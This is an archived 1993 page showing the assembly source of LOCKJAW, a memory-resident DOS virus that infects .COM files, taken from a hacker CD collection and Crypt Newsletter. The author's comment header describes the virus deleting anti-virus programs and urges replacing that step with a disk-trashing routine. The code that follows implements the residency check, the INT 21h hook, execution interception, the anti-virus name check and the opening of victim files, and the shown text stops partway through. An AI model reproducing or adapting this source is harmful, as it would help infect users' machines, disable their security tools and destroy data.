home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hackers Underworld 2: Forbidden Knowledge
/
Hackers Underworld 2: Forbidden Knowledge.iso
/
VIRUS
/
LOCKJAW.ASM
< prev
next >
Wrap
Assembly Source File
|
1993-01-29
|
18KB
|
562 lines
;LOCKJAW: a .COM-infecting resident virus with retaliatory
;anti-anti-virus capability. Programmed and contributed by Nikademus, for
;Crypt Newsletter 12, Feb. 1993.
;
;LOCKJAW is a resident virus which installs itself in
;memory using the same engine as the original Civil War/Proto-T virus.
;
;LOCKJAW hooks interrupt 21 and infects .COM files on execution, appending
;itself to the end of the "host."
;LOCKJAW will infect COMMAND.COM and is fairly transparent to a
;casual user, except when certain anti-virus programs
;(Integrity Master, McAfee's SCAN &
;CLEAN, F-PROT & VIRSTOP and Central Point Anti-virus) are loaded.
;If LOCKJAW is present and any of these programs are employed from
;a write-protected diskette, the virus will, of course, generate
;"write protect" errors.
;
;LOCKJAW's "stinger" code demonstrates the simplicity of creating a strongly
;retaliating virus by quickly deleting the anti-virus program before it
;can execute and then displaying a "chomping" graphic. Even if the anti-
;virus program cannot detect LOCKJAW in memory, it will be deleted. This
;makes it essential that the user know how to either remove the virus from
;memory before beginning anti-virus measures, or at the least run the
;anti-virus component from a write-protected disk. At a time when retail
;anti-virus packages are becoming more complicated - and more likely that the
;average user will run them from default installations on his hard file -
;LOCKJAW's retaliating power makes it a potentially very annoying pest.
;A virus-programmer serious about inconveniencing a system could do a
;number of things with this basic idea. They are;
; 1. Remove the "chomp" effect. It is entertaining, but it exposes the virus
; instantly.
; 2. Alter the_stinger routine, so that the virus immediately attacks the
; hard file. The implementation is demonstrated by LOKJAW-DREI, which
; merely makes the disk inaccessible until a warm reboot if an anti-virus
; program is employed against it. By placing
; a BONA FIDE disk-trashing routine here, it becomes very hazardous for
; an unknowing user to employ anti-virus measures on a machine where
; LOCKJAW or a LOCKJAW-like program is memory resident.
;
;These anti-anti-virus strategies are becoming more numerous in viral
;programming.
;
;For example, Mark Ludwig programmed the features of a direct-action
;retaliating virus in his "Computer Virus Developments Quarterly."
;Peach, Groove and Encroacher viruses attack anti-virus software by
;deletion of files central
;to the functionality of the software.
;
;And in this issue, the Sandra virus employs a number
;of anti-anti-virus features.
;
;The LOKJAW source listings are TASM compatible. To remove LOKJAW-ZWEI and
;DREI infected files from a system, simply delete the "companion" .COM
;duplicates of your executables. Ensure that the machine has been booted
;from a clean disk. To remove the LOCKJAW .COM-appending virus, at this
;time it will be necessary for you to restore the contaminated files from
;a clean back-up.
;
.radix 16
code segment
model small
assume cs:code, ds:code, es:code
org 100h
len equ offset last - begin
vir_len equ len / 16d
host: db 0E9h, 03h, 00h, 43h, 44h, 00h ; host dummy
begin:
call virus ; push i.p. onto the stack
virus:
jmp after_note
note:
db '[lÖçk⌡äW].ߥ.ÑîkådëMû$'
db '┼Hï$.pΓÖGΓåm.î$.à.{pΓÖ┼ö-┼].√âΓïåñ┼'
db '┼håÑk$.┼ó.ÇΓÿ₧'
after_note:
pop bp ; recalculate change in offset
sub bp,109h
fix_victim:
mov di,0100h ; restore host's
lea si,ds:[vict_head+bp] ; !
mov cx,06h ; !
rep movsb ; first 6 bytes
Is_I_runnin:
mov ax,2C2Ch
int 21h ; call to see if installed
cmp ax, 0DCDh
je Bye_Bye
cut_hole:
mov ax,cs ; get memory control block
dec ax
mov ds,ax
cmp byte ptr ds:[0000],5a ; check if last block -
jne abort
mov ax,ds:[0003]
sub ax,100 ; decrease memory
mov ds:0003,ax
Zopy_virus: ; copy to claimed block
mov bx,ax ; PSP
mov ax,es ; virus start
add ax,bx ; in memory
mov es,ax
mov cx,len ; cx = length of virus
mov ax,ds ; restore ds
inc ax
mov ds,ax
lea si,ds:[begin+bp] ; point to start of virus
lea di,es:0100 ; point to destination
rep movsb ; start copying the virus
mov [vir_seg+bp],es
mov ax,cs
mov es,ax ; restore extra segment
Grab_21:
cli
mov ax,3521h ; request address of interrupt 21
int 21h
mov ds,[vir_seg+bp]
mov ds:[old_21h-6h],bx
mov ds:[old_21h+2-6h],es
mov dx,offset Lockjaw - 6h ; revector to virus
mov ax,2521h
int 21h
sti
abort:
mov ax,cs ; get the hell outa
mov ds,ax ; Dodge
mov es,ax
xor ax,ax
Bye_Bye:
mov bx,0100h ; hand off to host
jmp bx
Lockjaw:
pushf ; is i checkin if
cmp ax,2c2ch ; resident
jne My_21h
mov ax,0dcdh
popf
iret
My_21h:
push ds
push es ; save all registers
push di
push si
push ax
push bx
push cx
push dx
check_exec:
cmp ax,04B00h ; is the file being
jne notforme ; executed?
mov cs:[name_seg-6],ds
mov cs:[name_off-6],dx
jmp chk_com ; start potential
; infection
notforme:
pop dx ; exit
pop cx ; restore all registers
pop bx
pop ax
pop si
pop di
pop es
pop ds
popf
jmp dword ptr cs:[old_21h-6]
int21:
pushf
call dword ptr cs:[old_21h-6] ; int 21h handler
jc notforme ; exit on error
ret
chk_com: cld ; this essentially copies
mov di,dx ; the name of the file
push ds ; and sets it up for
pop es ; comparison to the anti-
mov al,'.' ; virus defaults used in
repne scasb ; the_stinger
call the_stinger ; anti-virus stinger
cmp ax, 00ffh ; WAS the program an AV?
je notforme
cmp word ptr es:[di],'OC' ; is it a .com ?
jne notforme ; compare against extension
cmp word ptr es:[di+2],'M' ; masks in these two steps
jne notforme
call Grab_24 ; set critical error handler
call set_attrib
open_victim: ; open potential host
mov ds,cs:[name_seg-6]
mov dx,cs:[name_off-6]
mov ax,3D02h
call int21
jc close_file